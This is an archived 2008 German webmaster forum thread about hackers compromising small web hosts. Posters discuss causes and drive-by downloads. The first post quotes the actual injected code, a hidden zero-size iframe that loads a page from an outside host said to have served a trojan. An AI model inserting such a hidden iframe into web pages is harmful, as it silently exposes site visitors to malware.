ABAKUS

Ihr Partner in Sachen SEO und Online Marketing
https://archiv.abakus-internet-marketing.de/foren/

Hackerangriff auf Hoster

https://archiv.abakus-internet-marketing.de/foren/viewtopic.php?f=35&t=53398

Seite 1 von 1

Hackerangriff auf Hoster

Verfasst: 26.02.2008, 09:26
von guppy
kleine hoster scheinen derzeit von hackern belagert zu werden.
Einer der Hoster wo ich eine Domain liegen habe, ist auch betroffen (limtec).
Der Angreifer fügt folgenden code auf den Webseiten ein:
<iframe src="https://lipitor.freehoxt.com/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

So richtig erschließt sich mir der Sinn des Ganzen nicht, aber dafür gibt es ja hier kluge Köpfe ;-) .
Ach so , der Angreifer scheint nicht über den FTP zu kommen.

Verfasst:
von
SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Verfasst: 26.02.2008, 10:00
von catcat
Hast Du ein Board oder CMS da?
Falls ja: Welches?

Verfasst: 26.02.2008, 10:07
von guppy
nein - stinknormale html, scripte sind lediglich der cscounter und googlesitemap.
Ein telefonat mit dem hoster ergab dass es noch andere Seiten betrifft und ein befreubdeter webmaster berichtete das Gleiche von einem anderen hoster.
über shell ?

Verfasst: 26.02.2008, 10:09
von catcat
Dannn wird wohl der Hoster seinen Apachen nicht korrekt eingerichtet zu haben... :roll:

Verfasst: 26.02.2008, 10:19
von Pompom
Das ist der Grund, weshalb ich mich von kleinen Nieschenhostern fern halten, hinter denen oft nur 1...4 Frickelfrieds stehen.

Bei falsch gesetzten Nutzerrechten auf einem Server ist es kein Problem, über eine löchrige Applikation alle Kunden zu infizieren.

Auf dem Host https://lipitor.freehoxt.com/ siehst du nicht mehr das, wa Grund für den Hacker war, d.h. der Hoster freehoxt.com hat schon reagiert. Dort lagerte ursprünglich ein Torjaner, der deinen Usern untergeschoben werden sollte.

Verfasst: 26.02.2008, 10:33
von auftragslinker
@pompom: selbst bei großen hostern gibt es immer einen weg, einen server zu kompromittieren.

Verfasst: 26.02.2008, 12:03
von guppy
Pompom hat geschrieben:Dort lagerte ursprünglich ein Torjaner, der deinen Usern untergeschoben werden sollte.
#


?? ein Trojaner per iframe ?
so wie jetzt sah die Seite auch aus, als ich da die Abusemeldung mailte,
deshalb erschließt sich mir der Sinn ja nicht. Und der cache ist so eine Pillenseite.

Verfasst: 26.02.2008, 14:57
von chris21
?? ein Trojaner per iframe ?
Inzwischen übliche Methode, um Trojaner zu verbreiten. Such mal nach "Drive-by-Downloads", da wird einem übel.

Verfasst: 06.07.2008, 07:17
von seo-link
Es hat auch große Hoster getroffen!
Bei mir waren 2 HTML-Pages infiziert ... wie auch immer :o

Verfasst: 06.07.2008, 10:11
von Boa
warftp und Antivir User sind gerne mal betroffen

Verfasst: 06.07.2008, 10:13
von seo-link
Hab ich beides nicht am Laufen :)

Verfasst: 06.07.2008, 18:27
von swiat
Boa hat geschrieben:warftp und Antivir User sind gerne mal betroffen
Warum gerade die?
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de